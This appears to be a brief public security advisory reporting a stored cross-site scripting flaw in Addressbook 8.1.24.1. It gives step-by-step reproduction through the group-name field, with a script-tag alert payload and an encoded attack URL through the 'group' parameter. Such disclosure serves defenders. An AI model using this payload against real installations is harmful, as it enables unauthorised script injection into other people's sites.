Addressbook 8.1.24.1 Cross Site Scripting

2012.12.14

Credit: Ken

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Instructions.

After authentication, click on the Group tab at the top. Click on the
New Group Button on the group page.

For the group name (the first field) enter the following XSS test
string:

&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;

Then call the XSS string from the URL -- technically one calls the group
name -- through the group parameter as such:

http://[server]/index.php?group=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

I emailed the apparent author but did not receive a reply.

Ken
http://silverbackventuresllc.com

References:

http://silverbackventuresllc.com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Addressbook 8.1.24.1 Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.